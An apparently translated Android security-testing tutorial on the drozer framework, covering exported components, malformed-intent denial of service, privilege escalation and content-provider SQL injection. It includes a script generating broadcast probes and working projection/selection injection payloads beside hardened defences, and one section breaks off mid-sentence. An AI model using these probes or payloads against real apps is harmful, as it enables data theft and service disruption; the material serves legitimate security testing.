drozer, the open-source Android auditing framework -- an introduction to app security testing
Xbalien
2014/7/31
I. Using drozer to find attackable weak points (exposed components):
1. View the attack surface:
run app.package.attacksurface
dz> run app.package.attacksurface com.package.name
Attack Surface:
  8 activities exported
  2 broadcast receivers exported
  2 content providers exported
  0 services exported
2. Get the app's package information:
run app.package.info
dz> run app.package.info -a com.package.name
Package: com.package.name
  Application Label: app.name
  Process Name: com.package.name
  Version: 4.0
  Data Directory: /data/data/com.package.name
  APK Path: /data/app/com.package.name-1.apk
  UID: 10004
  GID: [1015, 3003]
  Shared Libraries: null
  Shared User ID: null
  Uses Permissions:
  - android.permission.BAIDU_LOCATION_SERVICE
  - android.permission.ACCESS_NETWORK_STATE
  - android.permission.WRITE_EXTERNAL_STORAGE
  - android.permission.INTERNET
  - android.permission.INSTALL_PACKAGES
  - android.permission.VIBRATE
  - android.permission.READ_PHONE_STATE
  - android.permission.KILL_BACKGROUND_PROCESSES
  - android.permission.ACCESS_WIFI_STATE
  - android.permission.WRITE_SETTINGS
  - android.permission.ACCESS_COARSE_LOCATION
  - android.permission.ACCESS_FINE_LOCATION
  - android.permission.SYSTEM_ALERT_WINDOW
  - android.permission.SYSTEM_OVERLAY_WINDOW
  - android.permission.RECORD_AUDIO
II. Triggering components with intents (denial of service, privilege escalation)
Triggering exposed components through intents generally yields two classes of vulnerability: denial of service and privilege escalation. Denial of service is low-severity and mostly just degrades the app's quality of service. Privilege escalation is worse: an app that lacks a permission can use an intent to trigger an exported component of an app that holds that permission, and so get the privileged action performed on its behalf.
1. List the exposed broadcast receivers:
run app.broadcast.info
dz> run app.broadcast.info -a com.package.name -i
Package: com.package.name
  Receiver: com.iver.AlarmReceiver
    Intent Filter:
      Actions:
        - wisorg.intent.action.PUSH_MESSAGE
    Intent Filter:
      Actions:
        - android.intent.action.DOWNLOAD_NOTIFICATION_CLICKED
        - android.intent.action.DOWNLOAD_COMPLETE
    Intent Filter:
      Actions:
        - wisorg.intent.action.alarm
        - wisorg.intent.action.BOOT
    Permission: null
  Receiver: com.iver.BootReceiver
    Intent Filter:
      Actions:
        - android.intent.action.BOOT_COMPLETED
    Permission: null
2. Test for denial of service by sending incomplete intents (a null action, or an action with empty extras) to the exposed receivers: run app.broadcast.send
The app throws an ANR, "Caused by: java.lang.NullPointerException" (visible in logcat): one denial-of-service bug found.
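As an added example (mine, not part of the original post and not drozer's own code), the Python below turns a pasted `app.broadcast.info` dump into the list of `app.broadcast.send` probes for step 2: for every exported receiver with no permission it emits one send with no action at all and one send per declared action with no extras, which is exactly the incomplete-intent pattern that produced the NullPointerException above. The sample dump is constructed by re-indenting the output shown on this page; the `--component PACKAGE COMPONENT` and `--action ACTION` flags are those of drozer's `app.broadcast.send` module (confirm with `run app.broadcast.send --help` on your version).

```python
"""Turn a drozer `app.broadcast.info` dump into `app.broadcast.send` DoS probes.

Added example: not part of the original post or of drozer itself.
Assumes drozer's app.broadcast.send accepts `--component PACKAGE COMPONENT`
and `--action ACTION`; verify with `run app.broadcast.send --help`.
"""
from dataclasses import dataclass, field

# Constructed sample, re-indented from the app.broadcast.info output on this page.
SAMPLE_DUMP = """\
Package: com.package.name
  Receiver: com.iver.AlarmReceiver
    Intent Filter:
      Actions:
        - wisorg.intent.action.PUSH_MESSAGE
    Intent Filter:
      Actions:
        - android.intent.action.DOWNLOAD_NOTIFICATION_CLICKED
        - android.intent.action.DOWNLOAD_COMPLETE
    Intent Filter:
      Actions:
        - wisorg.intent.action.alarm
        - wisorg.intent.action.BOOT
    Permission: null
  Receiver: com.iver.BootReceiver
    Intent Filter:
      Actions:
        - android.intent.action.BOOT_COMPLETED
    Permission: null
"""


@dataclass
class Receiver:
    name: str
    actions: list = field(default_factory=list)
    permission: str = "null"  # drozer prints "null" when nothing guards the receiver


def parse_broadcast_info(dump):
    """Parse the dump into (package, [Receiver]); indentation is ignored."""
    package, receivers, current, section = None, [], None, None
    for raw in dump.splitlines():
        line = raw.strip()
        if line.startswith("Package:"):
            package = line.split(":", 1)[1].strip()
        elif line.startswith("Receiver:"):
            current = Receiver(name=line.split(":", 1)[1].strip())
            receivers.append(current)
        elif line.endswith(":"):
            # "Intent Filter:", "Actions:", "Categories:", "Data:" ... remember which list we are in
            section = line[:-1]
        elif line.startswith("Permission:") and current is not None:
            current.permission = line.split(":", 1)[1].strip()
        elif line.startswith("- ") and current is not None and section == "Actions":
            current.actions.append(line[2:].strip())
    return package, receivers


def build_probes(package, receivers):
    """One probe with no action, plus one per action with no extras, per unguarded receiver.

    Receivers guarded by a permission are skipped: the drozer agent would first
    have to be rebuilt requesting that permission (`drozer agent build -p ...`).
    """
    probes = []
    for r in receivers:
        if r.permission != "null":
            continue
        base = f"run app.broadcast.send --component {package} {r.name}"
        probes.append(base)  # null action, no extras
        for action in r.actions:
            probes.append(f"{base} --action {action}")  # action set, extras still empty
    return probes


if __name__ == "__main__":
    pkg, recs = parse_broadcast_info(SAMPLE_DUMP)
    for probe in build_probes(pkg, recs):
        print(probe)
```

Paste each printed line into the `dz>` console and watch `adb logcat` for the ANR or NullPointerException trace; a receiver that crashes on a bare `--action` send is reading an extra it never checks for, and one that crashes with no action at all is dereferencing `intent.getAction()`. Drozer's `--extra TYPE KEY VALUE` flag is what you reach for next, in step 3, when the goal is a complete intent rather than a broken one.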
3. Try privilege escalation
Privilege escalation is much like the denial-of-service test, except that the goal is now to construct a more complete intent, one that satisfies the program's logic rather than breaking it. Since activities are mostly tied to user interaction, intent-based privilege escalation mostly targets broadcast receivers and services. As for privilege-escalation tooling related to drozer, it can
It can be seen that none of this app's providers set a permission. If a provider does set one, then as long as it is not signature-level you can build a drozer agent that requests that permission (drozer agent build -p <permission>) and carry on testing.
2. drozer can also scan for URIs that may be vulnerable to SQLite injection; where injection exists, the data behind the provider may be leaked or tampered with:
run scanner.provider.injection
dz> run scanner.provider.injection -a com.package.name
Scanning com.
Not Vulnerable:
  content://acts/
  content://com.package.name
  content://com.package.name.downloads
  content://acts
  content://com.package.name.downloads/
  content://com.package.name/
Injection in Projection:
  content://telephony/carriers/preferapn/
  content://com.package.name/favorites?notify=true/
  content://com.package.name/favorites?notify=true
  content://com.package.name/favorites?notify=false/
  content://telephony/carriers/preferapn
  content://com.package.name/favorites?notify=false
Injection in Selection:
  content://telephony/carriers/preferapn/
  content://com.package.name/favorites?notify=true/
  content://com.package.name/favorites?notify=true
  content://com.package.name/favorites?notify=false/
  content://telephony/carriers/preferapn
  content://com.package.name/favorites?notify=false
3. Try a simple injection:
run app.provider.query
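As an added example (mine, not part of the original post and not drozer's code), the Python below reproduces in plain SQLite what the "Injection in Projection" and "Injection in Selection" findings in step 2 mean for a provider behind `content://com.package.name/favorites`, and what the simple injection in step 3 actually sends. `vulnerable_query` builds the statement the way a provider that hands the caller's projection and selection straight to `SQLiteQueryBuilder` does; `hardened_query` adds the two defences that stop it (a projection map and the extra-parenthesis compile that `setStrict(true)` performs) and takes values only through selectionArgs. The two payloads are the strings you would pass as `run app.provider.query content://com.package.name/favorites --projection "..."` and `--selection "..."`. The schema, rows and the `secrets` table are constructed for the example; only the `favorites` table name is taken from the URIs above.

```python
"""Projection/selection injection in an Android-style content provider, simulated in SQLite.

Added example: not part of the original post or of drozer. Schema and rows are
constructed; only the table name `favorites` comes from the URIs on the page.
"""
import sqlite3

SCHEMA = """
CREATE TABLE favorites (_id INTEGER PRIMARY KEY, title TEXT, url TEXT);
CREATE TABLE secrets   (_id INTEGER PRIMARY KEY, token TEXT);
INSERT INTO favorites (title, url) VALUES ('home', 'http://example.invalid/');
INSERT INTO secrets (token) VALUES ('constructed-sample-token');
"""
TABLE = "favorites"
# External column name -> real column; the equivalent of SQLiteQueryBuilder.setProjectionMap()
PROJECTION_MAP = {"_id": "_id", "title": "title", "url": "url"}


def open_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def vulnerable_query(db, projection, selection, selection_args=()):
    """SELECT <projection> FROM favorites WHERE (<selection>): caller strings concatenated
    verbatim, which is what an un-hardened provider.query() amounts to."""
    cols = ", ".join(projection) if projection else "*"
    sql = f"SELECT {cols} FROM {TABLE}"
    if selection:
        sql += f" WHERE ({selection})"
    return db.execute(sql, selection_args).fetchall()


def hardened_query(db, projection, selection, selection_args=()):
    """Same query with the fixes: (1) every projection entry must be a key of
    PROJECTION_MAP; (2) the selection is compiled inside an extra pair of
    parentheses, as SQLiteQueryBuilder.setStrict(true) does, so a selection that
    closes the bracket early ("1=1) UNION ...") fails to parse; (3) values arrive
    only through `?` placeholders bound from selection_args."""
    wanted = projection or list(PROJECTION_MAP)
    unknown = [c for c in wanted if c not in PROJECTION_MAP]
    if unknown:
        raise ValueError(f"projection not in map: {unknown}")
    cols = ", ".join(PROJECTION_MAP[c] for c in wanted)
    sql = f"SELECT {cols} FROM {TABLE}"
    if selection:
        sql += f" WHERE (({selection}))"
    try:
        return db.execute(sql, selection_args).fetchall()
    except sqlite3.OperationalError as e:
        raise ValueError(f"selection rejected: {e}") from None


# The strings drozer's `app.provider.query --projection` / `--selection` would deliver.
PROJ_INJ = "name FROM sqlite_master WHERE type='table'--"   # comments out " FROM favorites"
SEL_INJ = "1=1) UNION SELECT token FROM secrets WHERE (1=1"  # breaks out of the WHERE ( ... )


def demo():
    """Run both payloads against both query paths and report what happened."""
    db = open_db()
    result = {
        "tables_leaked": sorted(r[0] for r in vulnerable_query(db, [PROJ_INJ], None)),
        "union_rows": set(vulnerable_query(db, ["title"], SEL_INJ)),
        "legit": hardened_query(db, ["title", "url"], "title = ?", ("home",)),
    }
    for label, args in (("hardened_proj", ([PROJ_INJ], None)),
                        ("hardened_sel", (["title"], SEL_INJ))):
        try:
            hardened_query(db, *args)
            result[label] = "accepted"
        except ValueError:
            result[label] = "rejected"
    return result


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Against the vulnerable path the projection payload lists every table in the database and the selection payload returns the `secrets` row alongside the legitimate one; the hardened path refuses both before any data is read. Note what the extra-parenthesis check does not cover: a selection such as `title = (SELECT token FROM secrets)` still parses, so strict mode limits break-outs but does not replace keeping user values in selectionArgs, and a provider that does not need to be exported should not be (or should carry a permission, which is the case the `drozer agent build -p` note above is about).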